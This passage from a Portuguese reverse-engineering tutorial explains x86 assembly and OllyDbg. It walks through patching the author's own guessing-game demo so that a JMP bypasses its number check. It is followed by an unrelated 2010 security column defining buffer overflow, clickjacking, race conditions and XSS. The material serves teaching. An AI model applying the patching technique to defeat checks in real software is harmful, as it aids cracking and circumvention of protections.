Opcodes (traduzido em operational code, ou código de operação) é a instrução que é enviada e interpretada pelo processador. Cada opcode, ao ser interpretado pelo processador, vai realizar uma operação. Mnemônicos são as palavras ou combinação de letras utilizadas para representar um opcode, tornando a linguagem de máquina mais legível. Veja abaixo um exemplo de um mnemônico do comando MOV:
Código:
```
MOV EAX,1
```
Esse comando em assembly apenas move o valor 1 para o registrador EAX (veremos isso logo adiante na explicação dos comandos). Na hora de transformar isso em linguagem de máquina (por um asssembler), esse comando é traduzido para um conjunto de números que possa ser interpretado pelo processador:
Código:
```
B801000000
```
A teoria por trás de tradução de mnemônicos em opcode (e vice-versa) é um tanto complexa, principalmente para a plataforma Intel na arquitetura IA32. É um processo que deve ser realizado bit a bit e fugiria um pouco do contexto deste tutorial.
A principal dificuldade na linguagem assembly é certamente a sua estrutura, que foge do padrão de linguagens de mais alto nível como C ou Pascal. Nada de Ifs com múltiplas comparações, Switches, For ou While. Tudo é feito com comparações simples e saltos, perdendo a sua linearidade (semelhante aos GoTo do BASIC).
Felizmente hoje temos debuggers muito inteligentes que conseguem estruturar e identificar rotinas e repetições, facilitando muito o trabalho de interpretação. Mesmo com essas melhorias, ainda acho importante ter um papel e uma caneta ao lado, onde você pode fazer anotações e ir estruturando/convertendo o código na medida em que você os interpreta.
Para o assembly, a localização dos valores e variáveis é sempre baseada nos endereços que elas ocupam na memória. O nome que você define para uma variável durante a programação é substituído pelo endereço de memória que ela ocupa. Cada instrução também possui um endereço, que é utilizado para controlar o fluxo e a estrutura do código. Sempre que você faz um salto, é necessário indicar o endereço que o código deve ser direcionado, semelhante ao que ocorria nas numerações de linhas dos BASICs mais antigos. Veja um exemplo abaixo de como ficaria um código em C e o seu resultado compilado para assembly, utilizando apenas registradores comuns:
Código:
```
void main() {
    int a = 4;
    int b = 6;
    int c;
      if((a == 4) && (b == 6)) {
        c = 5;     }
}
```
O código acima quando compilado pode se transformar em algo semelhante a isso (boa parte do código acima é inútil, estou utilizando somente para exemplificar):
Código:
```
00000000 MOV EAX,4h     ;move o valor 4 para EAX
00000005 MOV EBX,6h     ;move o valor 6 para EBX
0000000A CMP EAX,4h     ;compara EAX com 4, se for verdadeiro: ZF = 1
0000000D JNE 00000019h  ;se ZF != 1, pule para endereço 00000019h
0000000F CMP EBX,6h     ;compara EBX com 6, se for verdadeiro: ZF = 1
00000012 JNE 00000019h  ;se ZF != 1, pule para endereço 00000019h
00000014 MOV ECX,5h     ;move o valor 5 para ECX
00000019 RETN           ;finaliza execução e retorna
```
Pra entender o código acima é necessário entender sobre aquilo que compõe a linguagem assembly. Ela é basicamente composta por registradores, endereços e instruções (mnemônicos).
Os registradores foram explicados no capítulo anterior, mas vamos agora saber quem são eles. Os processadores da arquitetura Intel de 32 bits possuem basicamente nove registradores de 32 bits comuns: EAX, EBX, ECX, EDX, ESP, EBP, ESI, EDI e EIP. Teoricamente cada um desses registradores possui uma determinada “função padrão”, mas devido a sua escassez, muitas vezes eles são utilizados como registradores para qualquer propósito. Você pode criar um código usando livremente os oito primeiros registradores que não haverá muitos problemas (desde que saiba o que está fazendo/modificando). O último registrador, EIP, é quase sempre mantido intacto, pois ele é o responsável por contar as instruções e informar o endereço da próxima instrução. Alterar o seu valor pode desviar completamente o fluxo do aplicativo e provavelmente vai gerar uma falha de segmentação ou uma operação ilegal.
Esses registradores apresentados são todos de 32 bits. No entanto também é possível utilizar apenas 8 ou 16 bits, como mostra a tabela abaixo utilizando o EAX como exemplo (a teoria vale para os outros registradores também):

Para o caso da porção de 8 bits, o registrador terminado em L são os 8 bits menos significantes de AX e o terminado em H são os 8 bits mais significantes de AX. Para a porção de 16 bits, são utilizados os 16 bits menos significantes da porção de 32 bits.

Além dos registradores, também existem as Flags, que são bits utilizados como resultado de operações (verdadeiro ou falso, por exemplo). Elas são usadas principalmente para análise condicional em instruções como CMP e TEST. Dentre as diversas flags, as mais corriqueiras são: ZF (Zero Flag), CF (Carry Flag) e SF (Signal Flag). A ZF é setada sempre que uma operação resulta em zero (uma comparação entre dois números através do comando CMP subtrai seus operandos sem alterar valores e seta a ZF caso o resultado da subtração seja zero, indicando valores iguais). A flag CF é setada quando o resultado de uma operação estoura o valor máximo comportado pelo registrador/local sem considerar o sinal (overflow). Por último, tempos a SF, que é ativada sempre que o bit mais significativo de um operando for 1, indicando um valor negativo (pesquise sobre complemento de dois).
Os endereços na linguagem assembly são a base para o fluxo do aplicativo e para o armazenamento de dados. As variáveis que você usa durante a programação são substituídas por endereços que apontam para uma área da memória paginada com acesso a leitura e a escrita. Os destinos dos saltos (Jumps) também dependem dos endereços das instruções, pois é através deles que você informa o destino do salto.
O código abaixo demonstra apenas uma linha de assembly onde é possível ver o endereço da instrução (00401000) e o endereço para um byte de memória (00403000) para o qual o número nove está sendo movido:
Código:
```
00401000 MOV BYTE PTR DS:[00403000], 09h
```
Por último temos as instruções, que nada mais são do que os opcodes traduzidos em um mnemônico, como demonstrado e exemplificado alguns parágrafos acima.
Abaixo eu vou por uma pequena lista mostrando algumas das instruções mais utilizadas, pois seria inviável colocar todas elas (são aproximadamente 130 instruções bases para a arquitetura Intel).
- MOV destino, origem
  Move o valor do campo origem para o destino. Essa instrução possui diversas variações, por isso ela pode aparecer de diversas formas diferentes (pode-se trabalhar com constantes, memória, pilha, etc). Alguns exemplos:
  
  MOV EAX, 10h
  MOV AX, WORD PTR DS:[00403000]
  MOV BYTE PTR DS:[00403002], 1Ch
- CMP arg1, arg2
  Realiza uma comparação entre os dois operandos. A comparação é feita simplesmente subtraindo os dois operandos e caso o resultado for zero (valores iguais), ele seta a ZF para 1. Vale lembrar que essa operação não altera os valores dos operandos, apenas as flags.
  
  CMP EAX, 04h
- JMP endereço
  Faz um salto incondicional e obrigatório para o endereço indicado.
  
  JMP 00401008h
- JZ endereço / JE endereço
  Faz um salto condicional. Caso o valor da zero flag seja 1, ele realiza o salto. Normalmente utilizado junto com um CMP para realizar um desvio caso a comparação seja verdadeira.
  
  JE 0040101Ah
- JNZ endereço / JNE endereço
  Semelhante ao item acima, mas realiza o salto somente quando a zero flag não foi setada (ZF = 0).
  
  JNZ 0040102Ch
- ADD destino, arg1
  Adiciona o valor de arg1 ao destino. Também possui diversas variações, pelas mesmas razões do comando MOV. Se o resultado estourar o limite do destino, a CF é setada.
  
  ADD EBX, 04h
  ADD EBX, DWORD PTR DS:[00403032]
- SUB destino, arg1
  Realiza uma subtração dos operandos. As variações e características são as mesmas do comando ADD.
  
  SUB ECX, 2Ah
- PUSH valor
  Coloca o valor no topo da pilha (Stack). O comando PUSH é amplamente utilizado nas chamadas de funções (CALL), pois é através da pilha que a função busca seus argumentos.
  
  PUSH 08h
- POP destino
  Remove o valor do topo da pilha e o armazena no destino.
  
  POP EAX
- CALL local
  Faz chamada a uma função. É possível passar o local de diversas formas para o comando CALL, desde uma constante, registrador ou até mesmo uma função externa dentro de uma DLL. O comando CALL usa a pilha para indicar o endereço para o qual a função deve retornar depois de finalizada a sua execução.
  
  CALL User32!GetDlgItemTextA
  CALL 0040115Fh
Essas são as instruções mais comuns dentro de um binário compilado. Claro que existe mais de uma centena delas, mas eu procurei colocar aqui apenas aquelas que serão utilizadas no aplicativo de aprendizado. Para uma lista completa com uma explicação mais profunda dos opcodes, recomendo ver a lista apresentada neste endereço:
http://www.numaboa.com.br/informatic...ncias/opcodes/

INTERFACE DO OLLY DEBUGGER
Após uma boa parte teórica, chegou a hora de por em prática aquilo que acabamos de estudar. Neste capítulo vou apresentar um pouco da interface do OllyDbg, que apesar de intuitiva, merece esclarecimentos.
Para o nosso estudo, eu criei um simples aplicativo que iremos depurar mais a frente. Ele é necessário neste já neste capítulo (não para depuração, mas para a apresentação dos itens do Olly). Você pode baixar o arquivo executável juntamente com o seu código fonte (programado em assembly na sintaxe MASM32 utilizando o WinAsm Studio como IDE) no link abaixo:
http://www.fergonez.net/files/adivinhe.rar
O OllyDbg pode ser baixado gratuitamente através do site http://www.ollydbg.de. É bem pequeno e não necessita instalação, basta extrair o conteúdo para uma pasta qualquer.
Após extraído, abra o Olly, vá em “File->Open” e abra o nosso arquivo de estudo (adivinhe.exe). Rapidamente o Olly vai interpretar o arquivo e mostrar o disassembly na janela principal. Vamos deixar essa parte mais frente, já que o objetivo deste capítulo é apenas mostrar a interface, sem depurar o aplicativo por enquanto. A tela deve ser semelhante a essa:

A interface do aplicativo é composta por poucos botões. O segredo do Olly é o botão direito do mouse. A maioria das funções existentes no aplicativo pode ser acessada através do botão direito do mouse, sendo que os itens exibido no menu de popup variam de acordo com o local onde foi dado o clique (dependendo da coluna e da região).
Eu numerei as principais regiões da tela de 1 a 4.

Região 1

Esta é a tela principal do programa, onde é apresentado o disassembly do aplicativo. Ela é dividida em quatro colunas:
- Coluna 1 – Address. Ela nos mostra o endereço virtual das instruções (para saber mais sobre esse endereçamento, veja meu artigo sobre o funcionamento dos executáveis). Você pode reparar que os endereços não são em intervalos iguais para cada instrução. Isso ocorre devido ao fato de que o tamanho das instruções ser variável, como podemos observar na segunda coluna.
- Coluna 2 – Hex Dump. Aqui temos o código da instrução no seu formato hexadecimal (a cada 2 caracteres, temos 1 byte). São esses valores que ficam armazenados dentro do arquivo executável e que são passados para o processador. Como mencionado no parágrafo anterior, as instruções variam de tamanho, sendo que o endereço da próxima instrução é dado pelo endereço da instrução atual mais a soma dos bytes da instrução. Veja o exemplo do nosso aplicativo de exemplo. Ele começa no endereço 00401000 (padrão do Windows) e a sua primeira instrução é composta por 2 bytes (6A 00). O endereço da próxima instrução (na linha de baixo) vai ser o endereço atual somado com o tamanho da instrução (00401000+2) = 00401002.
- Coluna 3 – Disassembly. Essa coluna nada mais é do que a interpretação e a tradução para assembly das instruções presentes na segunda coluna. A análise do aplicativo é feita quase que inteiramente nela.
- Coluna 4 – Comments. Essa coluna não influencia no aplicativo, ela é utilizada apenas para comentários e informações. O Olly a utiliza para identificar as chamadas de função juntamente com os seus argumentos (você pode ver que ele identifica as chamadas da API do Windows em vermelho e lhe mostra os argumentos, facilitando e muito a interpretação).
Região 2
Essa área mostra todos os registradores e flags que nós vimos anteriormente (juntamente com diversos outros valores). A cada instrução essa tela é atualizada, mostrando o estado atual de cada um dos itens. Caso algum desses itens tenha sido modificado de uma instrução para outra, o Olly as colore com outra cor (nesse caso é o vermelho). As flags são mostradas logo abaixo dos registradores, abreviadas com a letra C (Carry Flag), Z (Zero Flag) e S (Signal Flag)

Região 3
Essa região nos mostra a memória física (RAM) destinada ao aplicativo. É possível observar o valor de cada byte de memória dentro do espaço reservado ao aplicativo. É composta por três colunas:
- Coluna 1 – Address. Mostra os endereços virtuais de memória.
- Coluna 2 – Hex Dump. Este espaço contém o valor de cada byte da memória. Por padrão o Olly coloca 8 bytes por linha e por essa razão a coluna de endereços cresce de 8 em 8 bytes.
- Coluna 3 – ASCII. Essa coluna pode ser utilizada para exibir de formas diferentes os valores contidos na memória. Por padrão o Olly opta por exibir a representação ASCII desses valores. O modo de representação pode ser alterado utilizando o botão direito do mouse.
Região 4
Mostra o estado atual da pilha (stack). Como visto anteriormente, a pilha é amplamente utilizada durante as chamadas de função. O VisualBasic é uma linguagem que faz um uso muito grande da pilha, principalmente pela quantidade de funções que são utilizadas pelo aplicativo. Também é dividida em 3 colunas :
- Coluna 1 – Address. Cumpre o mesmo papel das outras colunas de endereço. Nota-se que o endereço cresce de quatro em quatro bytes, pois cada posição da pilha é ocupada por um tipo DWORD (4 bytes)
- Coluna 2 – Value. Valor armazenado naquele endereço da pilha
- Coluna 3 – Comment. Utilizado para comentários e mostrar informações relevantes sobre aquele endereço. O Olly identifica diversos itens da pilha (como endereços de retorno) e adiciona essas informações na coluna de comentários.
Além das regiões nós temos a barra de ferramentas:

Abaixo uma descrição de cada botão, da esquerda para a direita.
- Open - Abre o executável para depuração
- Restart – Recarrega o aplicativo atual
- Close – Fecha a aplicação carregada
- Play – Inicia a execução e depuração do aplicativo. Caso nenhum breakpoint tenha sido posicionado (veremos adiante), o programa será executado normalmente.
- Pause – Pausa o aplicativo em andamento
- Step Into – Caso um breakpoint tenha sido colocado em uma chamada de função, esse botão lhe permite fazer a depuração do conteúdo dessa função.
- Step Over – O contrário do item anterior. Ele simplesmente não “entra” dentro da chamada (mas ainda assim a executa), continuando a depuração na próxima instrução.
- Trace Into – Utilizado apenas quando está se faz backtracing. Ele registra as ações e endereços em um log, registrando também o conteúdo das funções chamadas.
- Trace Over – Semelhante ao item acima, mas não faz o registro do conteúdo das chamadas.
- Execute Till Return – Executa as instruções até encontrar o primeiro comando de retorno (RETN).
- Go to Address – Permite ao usuário especificar um endereço do código para visualizar.
Após os comandos básicos de depuração, temos os botões das janelas:
- L – Show Log Window: exibe um log, no qual o Olly registra algumas ações como carregamento de plugins, etc.
- E – Show Modules Window: exibe todos os módulos e funções externas utilizados pelo programa (DLLs). Com o menu direito é possível acessar uma gama de opções dentro dessa janela (o mesmo vale para todas as outras janelas que forem mencionadas). Essa janela de módulos é muito importante para configurar breakpoints nas APIs do Windows, facilitando a aproximação em determinada região do código.
- M – Show Memory Window: mostra o estado da memória que está sendo utilizado pelo aplicativo, incluindo as seções do executável e tabelas de importação/exportação. Para um detalhamento byte a byte da memória, deve se utilizar a região de memória física mostrada na janela principal do aplicativo.
- T – Show Threads: exibe o estado de cada thread contida no aplicativo. Em aplicações multi-threading é possível, através dessa janela, ter um controle sobre cada uma das threads.
- W – Show Windows: mostra a estrutura e configuração das janelas carregadas pelo aplicativo (definida pelo WinProc). Os dados só são mostrados com o programa em execução e precisa ser atualizada manualmente pelo usuário (através do botão direito do mouse).
- H – Show Handles: exibe uma informação detalhada sobre os handles (referência a um objeto) que estão sendo utilizados pelo aplicativo. Quando o aplicativo abre um arquivo, é retornado um handle, que é utilizado para fazer a leitura e escrita, por exemplo.
- C – Show CPU: janela padrão do aplicativo, que é aberta automaticamente na hora de carregar o alvo. O seu conteúdo já foi explicado nos itens anteriores (onde as regiões foram numeradas de 1 a 4).
- / - Show Patches: as modificações feitas no executável ficam registradas nessa janela, facilitando a modificação ou o retorno à instrução original.
- K – Show Call Stack: mostra uma pilha de todas as chamadas de função até então feitas pelo aplicativo.
- B – Show Breakpoints Window: exibe todos os breakpoints setados no programa alvo.
- R – Show references: exibe todas as referências encontradas durante uma busca (seja ela uma constante, instrução, string). Veremos mais sobre elas adiante.
- ... – Run Trace: nessa janela é mostrado o resultado da operação de tracing (mencionada quando falamos de Trace Into/Over). Tracing é um processo um pouco complicado, por isso a sua explicação detalhada será apresentada mais a frente (é possível encontrar uma boa explicação na própria ajuda do Olly).
- S – Show Source: quando o aplicativo alvo é compilado com as informações de debug, normalmente o código assembly resultante também é armazenado. Nesse caso essa janela exibe esse código e mostra em tempo real o local no código fonte original que está sendo executado no momento. Muito útil para comparar o código assembly escrito e o compilado.
Por último temos os botões de configuração e ajuda.
- Debugging Options – Exibe a janela de configuração do Olly. A princípio não é necessário alterar nada para fazer a depuração, a não ser que você tenha noção de onde está mexendo.
- Appearence – Permite configurar o esquema de cores. Recomendo alterar essas configurações para algo que lhe agrade, fazendo um “syntax highlighting” do código, facilitando a leitura.
- Help – Mostra a janela de ajuda do Olly. A ajuda está em Inglês.
Estas foram as opções contidas na barra de ferramentas. O Olly também conta com um menu tradicional, que contém basicamente as mesmas funções da barra de ferramentas. Um dos itens do menu que vale a pena mencionar é o de plugins. O Olly suporta a criação de plugins, sendo alguns deles muito úteis. Por padrão ele vêm apenas com dois plugins, um de bookmarks e outro de comandos, que adiciona uma caixa de texto no rodapé do programa onde você pode entrar com ações e comandos de forma semelhante ao SoftICE.
No rodapé do Olly fica uma pequena barra de status, que além de mostrar o estado atual do alvo (finalizado, pausado ou em execução), serve como um informativo.

FORMAS DE APROXIMAÇÃO
Uma das maiores dificuldades em debugging de baixo nível (em assembly) é identificar o local onde se encontra aquele trecho de código de deseja analisar. Existem diversas manhas para convergir ao local correto, sendo que vou citar duas das mais utilizadas.
A primeira delas consiste em buscar em buscar por strings. Na maioria dos casos todo o texto presente em um aplicativo fica armazenado em uma string table (tabela de strings), cada uma com seu número identificador. Normalmente quem decide o que vai para a tabela de strings ou o que é referenciado diretamente no código é o compilador, por isso esse método nem sempre é totalmente funcional, mas costuma ter bons resultados.
Certo, mas que strings devemos procurar? Nós queremos é encontrar o local onde é feita a comparação do número digitado com o número correto. Se o número não for aquele que você digitou, ele vai exibir uma mensagem, que contém um título e um texto. Isso é bastante interessante, pois a provável lógica do programa é verificar pelo número digitado e caso ele seja incorreto, nos mostrar a MessageBox. Se nós encontrarmos o local onde o texto é utilizado pela MsgBox, sabemos que estamos pertos e um pouco adiante de onde foi feita a verificação.
Há uma maneira bem direta de descobrir o local onde está a chamada para a MsgBox, mas vou focar mais no sistema de busca por string. Vamos lá. Entre com um valor qualquer (maior que 0 e menor que 21) e mande verificar. Provavelmente você recebeu uma mensagem semelhante a essa:

Repare que ela é composta por um título e um texto. Que tal verificar se é possível buscar esses textos dentro do OllyDbg. Para tal, na janela principal, sobre o disassembly do código, clique com o botão direito e vá em “Search For -> All referenced text strings”. Isso fará com que o Olly mostre uma janela contendo todas as strings que são referenciadas por algum comando dentro do código. Note que no conteúdo da janela apareceram três itens:

Podemos observar que temos três referências ao texto mensagem, ocorrendo em diferentes endereços. “Curiosamente” a string “Mensagem.” é o título da mensagem de texto que recebemos ao entrar com um valor errado. Isso significa que encontramos 3 possíveis locais onde a caixa de texto é exibida. Uma maneira fácil de descobrir qual das três é a verdadeira (mais pra frente veremos que na realidade nenhuma delas é “falsa”, são apenas mensagens de texto diferentes) é setando um breakpoint sempre a mensagem de texto for referenciada. Para tal, clique com o botão direito em qualquer uma das linhas e selecione “Set Breakpoint on every command”. Sempre que a mensagem for utilizada, o Olly vai pausar a execução e lhe mostrar onde a execução foi congelada.
Com o breakpoint configurado, apenas digite novamente o número no aplicativo de teste (sem fechar ou reiniciar o Olly). Assim que você clicar no botão, ao invés de exibir a mensagem de número incorreto, o Olly vai pausar a execução e lhe mostrar o local onde a referência de texto foi utilizada. Você deve ter parado aqui (linha marcada em cinza):

Foi bem como queríamos. Paramos bem no local onde o endereço da mensagem é colocado na pilha para ser utilizada pela função MessageBoxA:

Por curiosidade, note que temos 3 chamadas para a função MessageBox. Pelo texto de cada uma é possível identificar que a primeira é referente ao texto de quando você acerta o número, a segunda (que nós estamos) é de quando você erra e a última é para quando você entra com um valor fora do intervalo especificado. Isso explica também o fato de termos três referências a string “Mensagem.”, pois ela é utilizada pelas três chamadas.
Como mencionado anteriormente, esse método nos faz convergir para um local além de onde foi feita a comparação (pois a mensagem de texto é exibida somente depois que o valor é verificado). Para encontrar a comparação a partir do local atual podem-se utilizar diversos métodos. Alguns preferem simplesmente ir analisado o código acima da MsgBox “na mão” ou fazer um backtrace, que consiste em analisar o código asm inversamente. Como esse aplicativo é bem pequeno, fica fácil achar o local na marra, mas vou dar uma visão sobre o backtracing. O Olly felizmente possui várias funções que ajudam na interpretação do código, sendo que vamos utilizar as referências de salto para essa situação. Para chegar até a mensagem de texto, muito provavelmente foi feito um salto, já que a provável lógica seria:
1. Adquire os dados digitados pelo usuário
2. Compara com o valor real
3. É igual?
4. Caso não seja igual, pule para ...
5. Caso seja igual continue/pule para outro local
Sabendo onde foi realizado o salto nos deixa mais próximo ainda do local da comparação. Como o pulo foi realizado para mostrar a mensagem de texto, destino mais provável para o salto é quando os dados da mensagem de texto começam a ser empilhados. Selecione a linha logo acima da atual, onde tem o comando PUSH 0 (primeiro valor colocado na pilha). Note que o Olly identifica esse local como sendo o alvo de um salto (veja na parte de baixo da região do disassembly):

Basicamente ele está te dizendo que para chegar ao local atual, foi feito um salto no endereço 00401061. Podemos ir até esse local e verificar se esse salto realmente existe. Clique com o botão direito sobre essa linha (no endereço 00401079) e vá em “GoTo -> JNZ from 00401061”. Isso nos levará diretamente para o local do salto:

Fomos levados até o endereço 00401061 onde realmente existe um salto (JNZ SHORT adivinhe.00401079) e provavelmente estamos bem próximo do local da comparação. Realmente estamos. Analise as linhas que antecedem o salto. Temos uma chamada a função GetDlgItemInt (busca um inteiro contido dentro de um item da janela, que nesse caso é uma caixa de texto) e o armazena em EAX (isso é padrão, todo retorno de função é em EAX). Em sequida temos:
1. Compare EAX com 1
2. Se for menor, pule para 0040108F
3. Compare EAX com 14 (os números são em hex, logo 14h = 20 decimal)
4. Se for maior, pule para 0040108F
5. Compare EAX com 4
6. Se forem diferentes (JNZ/JNE), pule para 00401079
Creio que você já tenha sacado o que está ocorrendo. Ele está primeiramente verificando se o número digitado está dentro do intervalo (20 >= X >= 1). Se eles estão no intervalo, nenhum salto foi realizado, logo ele continua a execução. Logo após o valor digitado é comparado com o número 4, e se eles forem diferentes, o programa pula para aquela mensagem de texto que estávamos anteriormente. Que tal experimentar colocar o número 4 na caixa de texto do programinha de estudo e ver o resultado? Bingo, encontramos o local da comparação e por conseqüência, o número com o qual ele compara o valor digitado.
Esse código asm seria gerado basicamente por uma estrutura semelhante a esta, em um pseudocódigo:
Código:
```
Declara variável inteira X;
X = Número contido na caixa de texto;
Se X < 1 ou X > 20 Então
  Exibe mensagem de texto “Número Inválido”
Fim Se
Se X = 4 Então
  Exibe mensagem de texto “Parabéns”
Caso Contrário
  Exibe mensagem de texto “Você Errou”
Fim Se
```
Essa é uma das maneiras para localizar trechos de código em um debugger. É usado por muita gente, sendo que esse exemplo que apresentei é um “clássico”. Outra forma, muito mais direta, mas que exige um conhecimento da API do Windows é buscar pelas chamadas das funções das APIs do Windows.
Supondo que o usuário tenha certa experiência em programação (seja em asm ou em C), ele provavelmente conhece algumas funções do Windows, já que elas são necessárias para qualquer aplicativo visual. Como a lógica desse programa se baseia em buscar e comparar um dado digitado em uma caixa de texto, um usuário que já conheça um pouco da API sabe que é necessário usar uma função do Windows para realizar esse processo. As duas funções mais famosas que pegam dados de controles são: GetDlgItemText e GetDlgItemInt.
O Olly possui uma janela que mostra todas as funções utilizadas pelo programa, então podemos verificar se existe uma dessas duas funções no aplicativo alvo. Para isso, clique no botão E (ou use o atalho ALT+E) para abrir a janela de módulos. Vai ter uma breve lista, contendo na primeira linha o próprio programa e nas outras as DLLs dependentes. Clique sobre a linha que contém o nosso aplicativo (adivinhe) e vá em “View Names”. Isso exibirá uma lista com todas as funções utilizadas pelo aplicativo.

Eis a lista de funções utilizadas:

Note que a função GetDlgItemInt foi utilizada, como buscávamos. Para descobrir o local onde ela é usada pode-se utilizar o mesmo método de antes, clicando com o botão direito e selecionando “Set breakpoint on every referecence”. Daí basta continuar a execução do programa, digitar um número e clicar no botão. Quando o alvo for chamar a função, o Olly congela e exibe o local onde será feita a chamada, que é logo acima de onde é feita a verificação, como vimos anteriormente.
Eu particularmente prefiro este método sobre o das referências, por algumas razões:
- Ele normalmente nos leva para uma região bem mais próxima da verificação e antes dela. Utilizando as referências, você pode ser levado para um local muito além, necessitando de muito backtracing.
- Algumas referências de texto não aparecem na lista da string table, o que torna esse método mais prático.
- Não depende de mensagem de texto ou MessageBox, que nem sempre estão presentes em todos os aplicativos.
RE-ASSEMBLY

O Olly além de ser um ótimo debugger, é um ótimo assembler. Com ele também é possível editar o código em tempo real e observar as mudanças de comportamento. Todas as mudanças que você realiza no código ficam salvas já janela de “Show Patches” (/). Vamos agora ver como podemos modificar o código e re-salvar o nosso executável (muito útil para correção de bugs).

Reabra o nosso arquivo no Olly, caso ele esteja fechado. Nos capítulos anteriores discutimos um pouco sobre o funcionamento do nosso aplicativo de teste, então vamos agora fazer uma pequena modificação no mesmo para que ele sempre exiba a mensagem de “Você acertou”.

Nós tínhamos uma seqüência de comparações seguidas pelos seus respectivos saltos. A primeira verificava se o número era menor que 1, a segunda se ele era maior que 20 e a terceira se ele era em si o número escondido (4). Existem diversas formas de fazer com que o número seja sempre o correto. Vou listar algumas:
- Alterar o código forçando que o valor 4 seja movido para EAX antes da comparação.
- Anular o último salto (após o CMP EAX, 4), fazendo com que o fluxo do aplicativo siga direto para a mensagem correta.
- Desviando e forçando um salto para a mensagem correta logo na primeira comparação realizada.
Existem outras formas ainda, mas vamos ficar com essas três, pois são as mais óbvias. Eu vou utilizar o último método neste tutorial para exemplificar o processo.

O que basicamente nós vamos fazer é forçar um salto logo após a função GetDlgItemInt diretamente para a região que chama a nossa mensagem de texto “Você acertou...”, como mostra a imagem abaixo:

Para modificar o disassembly, basta clicar sobre a linha que deseja alterar e apertar a tecla “Espaço”. Isso fará com que uma janela se abra com um local onde você possa indicar a instrução que deseja colocar no local.

O nosso objetivo aqui é substituir o CMP EAX, 1 por um salto não-condicional até o local onde os argumentos da nossa mensagem de texto começam a ser selecionados (no PUSH 0, localizado no endereço 00401063).

Clique sobre a linha que contém o CMP EAX, 1 (no endereço 00401054) e pressione “Espaço”. A seguinte janela se abrirá:

Na caixa de texto é onde você entra com a instrução em assembly que deseja substituir. Caso a instrução que nós inserirmos seja menor (em bytes) que a instrução anterior, o Olly substitui esses bytes restantes pela instrução NOP, que não realiza nenhuma operação, evitando assim que fiquem resquícios e “lixos” do comando anterior (caso a caixa de seleção “Fill with NOP’s” esteja selecionada, claro).

Altere o CMP EAX, 1 por JMP 00401063, como mostra a figura:

Em seguida, basta clicar em Assemble para confirmar a modificação. Você deve ter notado que o Olly coloriu com vermelho aquilo que foi modificado. Note também que ele inseriu um comando NOP após o salto, indicando que o nosso opcode do salto era 1 byte menor que o comando anterior.

Você pode rodar o nosso aplicativo dentro do Olly e observar a modificação. Agora, com qualquer valor que você entre (mesmo aqueles fora do intervalo), o programa vai exibir a mensagem que desejávamos.

Como mencionado anteriormente, todas as modificações ficam armazenadas na janela de patches, que pode ser acessada clicando no botão “\” ou através o atalho CTRL+P. Para alternar entre a instrução modificada e a original, basta selecionar a modificação desejada na janela de patches e apertar “Espaço” (ou através do botão direito -> “Restore original code”).

Para salvar o novo executável é bem simples. Na janela de dissassembly, clique com o botão direito e vá para “Copy to Executable -> All modifications”. Uma pequena janela se abrirá perguntando se você deseja copiar o código modificado. Selecione “Copy All”. Uma nova janela, contendo todo o código modificado, será exibida. Clique com o botão direito sobre ela e selecione “Save File”. Basta escolher o local e você terá um novo executável, contendo a modificação realizada.

Diferentes tipos de vulnerabilidades e ataques de hackers

2010-07-08T23:43:00.001-03:00

Segurança da informação pode ser um assunto complicado. São muitos termos diferentes. Para elucidar um pouco como ataques e vulnerabilidades funcionam, a coluna Segurança para o PC preparou um “dicionário” em uma linguagem simples para que você possa entender o funcionamento de algumas brechas e saber como hackers ganham acesso não autorizado a diversos sistemas. Confira.
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.), vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quartas-feiras.

Buffer overflow

É quando “dado vira código”. Programas de computador processam dados a todo o momento. Por exemplo, um programa de mensagem instantânea processa dados quando recebe uma mensagem. Um processador de texto processa dados quando você digita ou quando insere uma imagem. Um reprodutor de mídia processa dados quando você abre um arquivo MP3 e assim por diante.
Para processar tudo isso, os programas precisam reservar um espaço de memória para armazenar os dados a serem processados. Um hacker pode fazer com que o programa reserve menos espaço de memória do que o necessário e tente colocar os dados naquele espaço mesmo assim. O resultado é um problema grave, pois aquilo que não couber vai “vazar” no resto da memória.
Há diversos truques que os hackers usam para fazer com que os dados acabem caindo em um espaço de memória usado por códigos. Código é aquilo que o CPU do computador vai processar, ou seja, é programa. Com isso, os dados se transformam em código. E código pode fazer qualquer coisa no sistema. É o tipo de brecha mais grave que existe nos programas de computador. Tecnologias como Prevenção de Execução de Dados (DEP) tentam prevenir justamente que esse tipo de erro resulte em dado se transformar em código executável, como o próprio nome sugere.
Se você não consegue visualizar o problema, é o mesmo que acontece quando você coloca mais água do que cabe em uma garrafa. O líquido cai onde não devia. O “líquido”, nesse caso, são dados. E ele espirra e cai na “garrafa” dos códigos, que vai ser levada pelo processador.
Brechas que permitem que arquivos de dados como imagens, vídeos e texto instalem vírus no PC são geralmente buffer overflows.

Clickjacking

Uma página maliciosa pode fazer o navegador carregar páginas legítimas de modo invisível. Botões nessa página maliciosa na verdade escondem botões na página verdadeira. Se o usuário clicar no botão, na verdade o botão na página carregada “por baixo” é que será clicado. Com isso, é possível, por exemplo, que alguém envie mensagens no Twitter ou envie links no Facebook ou no Orkut como se fosse você.
O ataque é possível porque o usuário faz login nesses sites e geralmente fica logado enquanto navega por outras páginas.

Condição de corrida

O que acontece quando dois usuários tentam comprar a última unidade da mesma mercadoria em um site de comércio eletrônico? Se o evento realmente ocorrer ao mesmo tempo, ambos os usuários podem acabar recebendo a mensagem de que o item está disponível, embora só um cliente possa ser atendido. Esse tipo de erro é chamado de condição de corrida.
Condições de corrida costumam resultar em dados corrompidos. Em alguns casos, uma condição de corrida pode resultar em problemas de segurança. Por exemplo, um jogo de computador tinha um problema em que uma condição de corrida fazia com que o sistema antipirataria do jogo multiplayer não funcionasse corretamente.

Site XSSed mantém registros de sites vulneráveis a ataques de Cross-site Scripting (Foto: Reprodução)

Cross-site Scripting (XSS)

Trata-se de uma falha em sites web. XSS permite que um indivíduo malicioso execute código Javascript no site alvo no contexto do usuário. Em muitos casos, é uma falha sem graves consequências. Em outros, pode permitir roubo de credenciais de acesso ou até execução de comando em nome de um administrador.

XSS persistente é aquele existente em itens de formulário (como recados no Orkut), que são armazenados no banco de dados do site e carregados com a página toda vez que ela for acessada.
XSS ficou em segundo lugar no top 10 da OWASP para 2010, uma lista que busca identificar quais são as brechas mais graves em sites de internet.

Cross-site Request Forgery (XSRF)

